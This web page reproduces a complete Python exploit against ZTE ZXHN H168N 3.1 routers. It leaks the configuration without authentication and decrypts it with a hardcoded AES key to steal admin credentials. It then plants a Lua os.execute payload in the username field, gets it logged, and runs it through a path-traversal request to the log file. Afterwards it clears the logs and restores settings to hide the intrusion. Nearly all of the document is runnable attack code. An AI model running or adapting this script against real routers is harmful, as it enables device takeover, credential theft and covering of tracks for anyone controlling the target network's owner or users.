Jump to content

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass

# Exploit Title:  ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/

import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES

def login(host, port, username, password):
    """Submit the login form to ``http://{host}:{port}/``.

    Sends a URL-encoded POST carrying ``username``/``password``, an empty
    ``Frm_Logintoken`` and ``action=login``. The response is discarded and
    nothing is returned.
    """
    form = dict(
        Username=username,
        Password=password,
        Frm_Logintoken="",
        action="login",
    )

    requests.post(
        f"http://{host}:{port}/",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def logout(host, port):
    """Submit the log-off form to ``http://{host}:{port}/``.

    Sends a URL-encoded POST with ``IF_LogOff=1`` and empty
    ``IF_LanguageSwitch``/``IF_ModeSwitch`` fields. The response is
    discarded and nothing is returned.
    """
    form = dict(
        IF_LogOff="1",
        IF_LanguageSwitch="",
        IF_ModeSwitch="",
    )

    requests.post(
        f"http://{host}:{port}/",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def leak_config(host, port):
    """POST a multipart form to the config page and save the reply.

    The raw response body is written to ``config.bin`` in the current
    working directory. Nothing is returned and the HTTP status is not
    inspected.
    """
    boundary = "---------------------------25853724551472601545982946443"

    # NOTE: the delimiter lines are the boundary string itself, without the
    # additional leading "--" that multipart bodies normally carry. This is
    # reproduced exactly as in the original request.
    body = "\r\n".join(
        [
            boundary,
            'Content-Disposition: form-data; name="config"',
            "",
            "",
            f"{boundary}--",
            "",
        ]
    )

    request_headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }

    connection = http.client.HTTPConnection(host, port)
    connection.request(
        "POST",
        "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp",
        body,
        request_headers,
    )
    payload = connection.getresponse().read()

    with open("config.bin", "wb") as out:
        out.write(payload)

    connection.close()

def _read_exactly(fd, size, desc="data"):
    """Read ``size`` bytes from ``fd``, or return ``None`` on a short read.

    ``desc`` is accepted for call-site readability but is not used.
    """
    data = fd.read(size)
    return data if len(data) == size else None

def _read_struct(fd, fmt, desc="struct"):
    """Read and unpack one ``struct``-formatted record from ``fd``.

    Returns the tuple produced by ``struct.unpack(fmt, ...)``, or ``None``
    when fewer than ``struct.calcsize(fmt)`` bytes are available.
    """
    raw = _read_exactly(fd, struct.calcsize(fmt), desc)
    return None if raw is None else struct.unpack(fmt, raw)

def read_aes_data(fd_in, key):
    """Collect the AES chunks from ``fd_in`` and decrypt them with ``key``.

    Each chunk is preceded by three big-endian 32-bit words; the second is
    the chunk length and the third is a marker whose value 0 ends the
    sequence. The concatenated chunks are decrypted with AES-ECB using
    ``key`` NUL-padded/truncated to 16 bytes.

    Returns a ``BytesIO`` positioned at offset 0 holding the decrypted
    bytes, or ``None`` if a header or chunk is truncated.
    """
    pieces = []
    more = True
    while more:
        header = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if header is None:
            return None
        piece_len, marker = header[1], header[2]

        piece = _read_exactly(fd_in, piece_len, desc="AES chunk data")
        if piece is None:
            return None

        pieces.append(piece)
        more = marker != 0

    aes_key = key.ljust(16, b"\0")[:16]
    plaintext = AES.new(aes_key, AES.MODE_ECB).decrypt(b"".join(pieces))
    return BytesIO(plaintext)

def read_compressed_data(fd_in, enc_header):
    """Inflate the zlib-compressed chunk sequence that follows ``enc_header``.

    ``enc_header`` is the unpacked header tuple: word 6 must equal the CRC32
    of words 0-5 (packed big-endian), and word 5 must equal the running
    CRC32 over all compressed chunk bytes.

    Each chunk is preceded by three big-endian 32-bit words: uncompressed
    length, compressed length, and a marker whose value 0 ends the sequence.

    Returns a ``BytesIO`` positioned at offset 0 holding the decompressed
    bytes, or ``None`` on any validation failure (bad header CRC, truncated
    input, undecodable chunk, length mismatch, bad data CRC).
    """
    expected_hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if enc_header[6] != expected_hdr_crc:
        return None

    running_crc = 0
    fd_out = BytesIO()

    while True:
        comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if comp_hdr is None:
            return None
        uncompr_len, compr_len, marker = comp_hdr

        chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
        if chunk is None:
            return None

        running_crc = zlib.crc32(chunk, running_crc)
        try:
            uncompressed = zlib.decompress(chunk)
        except zlib.error:
            # Report a corrupt chunk the same way as every other failure
            # in this function instead of letting zlib.error escape.
            return None
        if len(uncompressed) != uncompr_len:
            return None

        fd_out.write(uncompressed)
        if marker == 0:
            break

    if enc_header[5] != running_crc:
        return None

    fd_out.seek(0)
    return fd_out

def read_config(fd_in, fd_out, key):
    """Decode a config image from ``fd_in`` and write the payload to ``fd_out``.

    ``fd_in`` must be a seekable binary stream; it no longer has to be a
    real file with a ``.name`` attribute. ``key`` is the AES key (bytes)
    used when the encryption header asks for it.

    Steps performed:
      1. Walk the three version headers. They are read only to verify that
         the stream is long enough; their values are otherwise unused,
         apart from the offsets that locate the next header.
      2. At offset 0x80 read the signature header (magic 0x04030201) and
         skip the signature it announces.
      3. Read the 0x3C-byte encryption header (magic 0x01020304) and
         dispatch on its type word:
           * 1 or 2 - AES-decrypt the payload (requires ``key``);
           * 2      - additionally read a second header from the decrypted
                      stream, then treat the remainder as compressed;
           * 0      - zlib-chunk decompress the payload;
           * other  - pass the remaining bytes through unchanged.

    On any validation failure the function returns silently without
    writing to ``fd_out``. Always returns ``None``.
    """
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return

    # The second version header sits after the first one (0x14 bytes) plus
    # the length stored in its fifth word.
    fd_in.seek(0x14 + ver_header_1[4])
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return

    # The last word of the second header is the offset of the third one.
    fd_in.seek(ver_header_2[10])
    if _read_struct(fd_in, ">2H5I", desc="3rd version header") is None:
        return

    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return

    # The signature bytes themselves are not checked; reading them just
    # advances the stream to the encryption header.
    if _read_exactly(fd_in, sign_header[2], desc="signature") is None:
        return

    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return

    enc_type = encryption_header[1]

    if enc_type in (1, 2):
        if not key:
            return
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return

    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        # The decrypted stream is handled as compressed data from here on.
        enc_type = 0

    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return

    fd_out.write(fd_in.read())
    
def decrypt_config(config_key):
    """Decode ``config.bin`` and return the ``(username, password)`` it holds.

    ``config.bin`` is read from the current working directory and decoded
    with ``read_config`` into a temporary ``decrypted.xml``. Both files are
    removed before returning, including when decoding or parsing fails.

    The credentials are taken from the text following the first
    ``IGD.AU2`` marker: the ``val="..."`` attribute after ``User`` and the
    one after ``Pass``.

    Raises:
        FileNotFoundError: ``config.bin`` does not exist.
        IndexError: the decoded text does not contain the expected markers
            (for example because ``read_config`` rejected the input and
            wrote nothing).
    """
    try:
        # Leaving the ``with`` block closes (and therefore flushes) the
        # output file before it is re-opened for reading below.
        with open("config.bin", "rb") as encrypted, \
                open("decrypted.xml", "wb") as decrypted:
            read_config(encrypted, decrypted, config_key)

        with open("decrypted.xml", "r") as file:
            contents = file.read()
    finally:
        # Portable replacement for ``rm``; tolerate files never created.
        for path in ("config.bin", "decrypted.xml"):
            try:
                os.remove(path)
            except FileNotFoundError:
                pass

    account = contents.split("IGD.AU2")[1]
    username = account.split("User")[1].split("val=\"")[1].split("\"")[0]
    password = account.split("Pass")[1].split("val=\"")[1].split("\"")[0]

    return username, password

def change_log_level(host, port, log_level):
    """Apply a log level through the log-management page.

    ``log_level`` must be ``"critical"`` (sent as ``"2"``) or ``"notice"``
    (sent as ``"5"``); any other value raises ``KeyError`` before a request
    is made. The page and its handler are fetched with GET first, then the
    settings form is POSTed. Responses are discarded; returns ``None``.
    """
    level_code = {"critical": "2", "notice": "5"}[log_level]

    handler_url = f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua"

    form = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": level_code,
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": "",
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(handler_url)
    requests.post(
        handler_url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def change_username(host, port, new_username, old_password):
    """Submit the account-management form for instance ``IGD.AU2``.

    ``new_username`` is sent as ``Username``; ``old_password`` is sent as
    the current, new and confirmation password alike. The page and its
    handler are fetched with GET before the form is POSTed. Responses are
    discarded; returns ``None``.
    """
    handler_url = f"http://{host}:{port}/common_page/accountManag_lua.lua"

    form = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": "",
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(handler_url)
    requests.post(
        handler_url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data=form,
    )

def clear_log(host, port):
    """POST ``IF_ACTION=clearlog`` to the log-management handler.

    The log page and the handler are fetched with GET first. Responses are
    discarded; returns ``None``.
    """
    handler_url = f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua"

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(handler_url)
    requests.post(
        handler_url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "clearlog"},
    )

def refresh_log(host, port):
    """POST ``IF_ACTION=Refresh`` to the log-management handler.

    The log page and the handler are fetched with GET first. Responses are
    discarded; returns ``None``.
    """
    handler_url = f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua"

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(handler_url)
    requests.post(
        handler_url,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={"IF_ACTION": "Refresh"},
    )

def trigger_rce(host, port):
    """Issue two GETs to ``getpage.lua``, varying only ``nextpage``.

    The first requests the status page; the second passes a URL-encoded
    relative path ending in ``var/userlog.txt``. Responses are discarded;
    returns ``None``.
    """
    next_pages = (
        "ManagDiag_StatusManag_t.lp",
        "..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt",
    )
    for page in next_pages:
        requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage={page}&Menu3Location=0")

def rce(cmd):
    """Return ``cmd`` embedded in the ``<? ... ?>`` template string.

    The template calls ``_G.os.execute`` with ``rm /var/userlog.txt;``
    followed by ``cmd``. ``cmd`` is inserted verbatim, without escaping.
    """
    template = "<? _G.os.execute('rm /var/userlog.txt;{}') ?>"
    return template.format(cmd)

def pwn(config_key, host, port):
    """Run the full proof-of-concept sequence against ``host:port``.

    ``config_key`` is the AES key (bytes) handed to ``decrypt_config``.
    The calls below are order-dependent; each step relies on device state
    left by the previous one. Prints ``[+] PoC complete`` when every call
    has returned. Returns ``None``.
    """
    # Download the config image to config.bin and pull the account
    # credentials out of it.
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    
    login(host, port, username, password)

    # Fixed demonstration command; it is wrapped by rce() into the
    # template string used as the temporary username below.
    shellcode = "echo \"pwned\""
    payload = rce(shellcode)

    # Rename the account to the payload, then switch the log level to
    # "notice" with a log refresh before and after.
    # NOTE(review): presumably this gets the payload recorded in
    # /var/userlog.txt - not verifiable from this file.
    change_username(host, port, payload, password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)

    # Request the log file through the nextpage parameter, then clear it.
    trigger_rce(host, port)
    clear_log(host, port)

    # Restore the original username and the "critical" log level, then
    # end the session.
    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")

def main():
    """Parse the command line and hand the options to ``pwn``.

    ``--host`` and ``--port`` are required; ``--config_key`` is encoded to
    bytes and falls back to the built-in default when omitted.
    """
    cli = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    cli.add_argument(
        "--config_key",
        type=lambda text: text.encode(),
        default=b"GrWM3Hz&LTvz&f^9",
        help="Leaked config encryption key from cspd",
    )
    cli.add_argument("--host", required=True, help="Target IP address of the router")
    cli.add_argument("--port", required=True, type=int, help="Target port of the router")

    options = cli.parse_args()

    pwn(options.config_key, options.host, options.port)

# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
            

0 Comments

Recommended Comments

There are no comments to display.

Guest
Add a comment...